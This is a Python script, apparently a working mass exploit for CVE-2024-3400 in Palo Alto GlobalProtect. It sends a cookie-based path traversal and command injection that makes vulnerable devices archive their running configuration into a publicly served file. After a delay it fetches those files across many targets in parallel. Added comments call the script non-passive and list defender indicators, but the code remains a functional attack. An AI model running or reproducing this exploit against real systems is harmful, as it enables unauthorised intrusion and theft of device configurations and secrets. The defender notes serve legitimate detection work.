CVE-2024-3400-RCE-CHECK.py
import argparse
import base64
import random
import string
import time
from concurrent.futures import ThreadPoolExecutor, wait
import urllib3
import requests
# Silences every urllib3 warning for the whole process, including the
# InsecureRequestWarning that the verify=False requests in this file would
# otherwise emit for each unverified TLS connection.
urllib3.disable_warnings()
def GenerateRandomString(length):
    """Return a random string of `length` lowercase letters and digits.

    The characters come from the `random` module, which is not a
    cryptographically secure generator. The only caller in this file uses the
    result as a throwaway file-name component.
    """
    alphabet = string.ascii_lowercase + string.digits
    picked = []
    for _ in range(length):
        picked.append(random.choice(alphabet))
    return ''.join(picked)
# Result files, opened in "w" mode as soon as the module is loaded, so any
# results from a previous run are truncated. Both handles are module-level
# globals shared by the worker threads; nothing in this file takes a lock
# around the writes or closes the handles.
# mayberce.txt: URLs for which the probe POST returned HTTP 200 (candidates only).
maybeRceFile = open("mayberce.txt", "w", encoding="utf-8")
# yesRce.txt: candidate URLs that later answered a plain GET with HTTP 200.
yesRceFile = open("yesRce.txt", "w", encoding="utf-8")
def CreateTarFile(url, proxy):
    """Send the CVE-2024-3400 probe request to one target and log a candidate URL.

    The function builds a `tar` command that archives the device's
    running-config.xml into a file under the GlobalProtect portal's js
    directory. It base64-encodes that command and places it, wrapped in
    backticks, in a SESSID cookie whose value traverses into the
    device_telemetry/minute directory. The cookie is sent in a POST to
    /ssl-vpn/hipreport.esp.

    NOTE(review): despite the "CHECK" in the script name this is not a passive
    test. On a vulnerable device the command runs and a copy of the running
    configuration is left at a path the portal serves. Nothing in this file
    removes that copy afterwards.

    Defender notes (all taken from the request built below):
      * Web logs: POST /ssl-vpn/hipreport.esp with a SESSID cookie containing
        "/../", backticks or "${IFS}".
      * Filesystem: files named jquery.<10 lowercase letters/digits>.js under
        /var/appweb/sslvpndocs/global-protect/portal/js/.
      * Filesystem: presumably entries with shell metacharacters in their
        names under /opt/panlogs/tmp/device_telemetry/minute/ (confirm on the
        device).
      * The fixed Chrome/51 User-Agent is a weak secondary indicator.
      * A device showing these artifacts should be treated as having exposed
        its configuration: apply the vendor fix for CVE-2024-3400 and rotate
        the secrets held in that configuration.

    Args:
        url: Base URL of the target; the endpoint path is appended to it.
        proxy: Proxies mapping passed straight to `requests.post`.

    Returns:
        None in every case. Errors of any kind are swallowed by the bare
        `except` at the end.
    """
    try:
        # Random component, so each target gets its own output file name.
        filename = GenerateRandomString(10)
        # Command the target is meant to run: archive the running config into
        # a web-served directory under a jquery-looking name.
        cmd = f"tar -czf /var/appweb/sslvpndocs/global-protect/portal/js/jquery.{filename}.js /opt/pancfg/mgmt/saved-configs/running-config.xml"
        # Base64 text with the trailing "=" padding stripped.
        base64_cmd = base64.b64encode(cmd.encode()).decode().rstrip("=")
        headers = {
            # Path traversal plus backtick command substitution; ${IFS} stands
            # in for spaces, so the cookie value itself contains none.
            "Cookie": "SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/`echo${IFS}" + base64_cmd + "|base64${IFS}-d|bash${IFS}-i`",
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
        }
        # verify=False: the target's TLS certificate is not validated.
        resp = requests.post(url=url + "/ssl-vpn/hipreport.esp", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
        if resp.status_code == 200:
            # HTTP 200 only means the endpoint accepted the POST; it does not
            # show that the command ran. The URL is therefore a candidate.
            maybeRceFile.write(f"{url}/global-protect/portal/js/jquery.{filename}.js\n")
        else:
            pass
    except:
        # Bare except: timeouts, TLS errors and even KeyboardInterrupt are
        # dropped silently, so a failed target leaves no trace in the output.
        pass
def CheckTarFile(url, proxy):
    """Fetch a candidate URL and record it when the server answers HTTP 200.

    Only the status code is examined; the response body is never read or
    saved. A 200 therefore shows that something is served at that path, not
    what it is, so a server that answers 200 for arbitrary paths would be
    recorded as a false positive.

    The request is sent with no cookie or credentials, which is what makes a
    hit significant for a defender: the file is reachable without logging in.

    Args:
        url: Full URL of the file to look for.
        proxy: Proxies mapping passed straight to `requests.get`.

    Returns:
        None when the request completes (whatever the status), False when any
        exception is raised.
    """
    browser_headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    }
    try:
        # verify=False: the server certificate is not validated.
        reply = requests.get(
            url=url,
            headers=browser_headers,
            proxies=proxy,
            verify=False,
            allow_redirects=False,
            timeout=10,
        )
        if reply.status_code != 200:
            return None
        print(f"[+] Can be RCE: {url}")
        yesRceFile.write(f"{url}\n")
    except:
        # Bare except kept as in the original: every failure maps to False.
        return False
def GetUrls(urlFileName):
    """Yield the de-duplicated entries of a URL list file, each forced to https.

    Every line is stripped of surrounding whitespace and has each occurrence
    of "https://" and "http://" removed. Duplicates are collapsed through a
    set, so the output order is not the file order. "https://" is then put
    back in front of each remaining entry. A blank line in the file produces
    the bare entry "https://".

    Args:
        urlFileName: Path of a text file with one host or URL per line.

    Yields:
        str: "https://" followed by the scheme-less entry.
    """
    with open(urlFileName, "r") as handle:
        scheme_less = [
            raw.strip().replace("https://", "").replace("http://", "")
            for raw in handle.readlines()
        ]
    unique_entries = set(scheme_less)
    yield from ("https://" + entry for entry in unique_entries)
def ThreadCreateTarFile(file2check, proxy, max_thread_num):
    """Run CreateTarFile against every entry of `file2check` on a thread pool.

    Blocks until all submitted calls have finished. The pool is not shut down
    explicitly. Because CreateTarFile swallows its own errors, the futures
    carry no failure information.

    Args:
        file2check: Path of the target list, read through GetUrls.
        proxy: Proxies mapping forwarded to each CreateTarFile call.
        max_thread_num: Maximum number of worker threads.
    """
    pool = ThreadPoolExecutor(max_workers=max_thread_num)
    pending = [
        pool.submit(CreateTarFile, target, proxy)
        for target in GetUrls(file2check)
    ]
    wait(pending)
def ThreadCheckTarFile(proxy, max_thread_num):
    """Run CheckTarFile against every candidate in mayberce.txt on a thread pool.

    The candidate list is read back through GetUrls, so each entry is
    de-duplicated and re-prefixed with "https://". Blocks until every
    submitted call has finished. The pool is not shut down explicitly.

    Args:
        proxy: Proxies mapping forwarded to each CheckTarFile call.
        max_thread_num: Maximum number of worker threads.
    """
    pool = ThreadPoolExecutor(max_workers=max_thread_num)
    pending = [
        pool.submit(CheckTarFile, candidate, proxy)
        for candidate in GetUrls("mayberce.txt")
    ]
    wait(pending)
def ParseArgs():
    """Parse the command line and return the resulting namespace.

    Options:
        -p/--proxy   Proxy URL. Defaults to http://127.0.0.1:8083, so a proxy
                     is always configured unless an empty value is passed.
        -f/--file    Path of the target list (required).
        -t/--thread  Number of worker threads. Defaults to 100.
    """
    cli = argparse.ArgumentParser(description="CVE-2024-3400-RCE-CHECK")
    cli.add_argument(
        "-p",
        "--proxy",
        type=str,
        default="http://127.0.0.1:8083",
        help="proxy url, eg: http://127.0.0.1:8083",
        required=False,
    )
    cli.add_argument(
        "-f",
        "--file",
        type=str,
        help="target urls to check, eg: urls.txt",
        required=True,
    )
    cli.add_argument(
        "-t",
        "--thread",
        type=int,
        default=100,
        help="threads to scan",
        required=False,
    )
    parsed = cli.parse_args()
    return parsed
if __name__ == "__main__":
    args = ParseArgs()
    # An empty --proxy value disables proxying. Otherwise the same proxy is
    # used for both http and https traffic; the default is a local listener
    # on 127.0.0.1:8083.
    proxy = {"http": args.proxy, "https": args.proxy} if args.proxy else {}
    # Phase 1: send the probe request to every target in the list.
    ThreadCreateTarFile(args.file, proxy, args.thread)
    # Fixed 320-second pause between the two phases.
    # NOTE(review): presumably this gives targets time to act on the request
    # before they are polled; confirm.
    time.sleep(320)
    # Phase 2: request each candidate URL recorded in mayberce.txt.
    ThreadCheckTarFile(proxy, args.thread)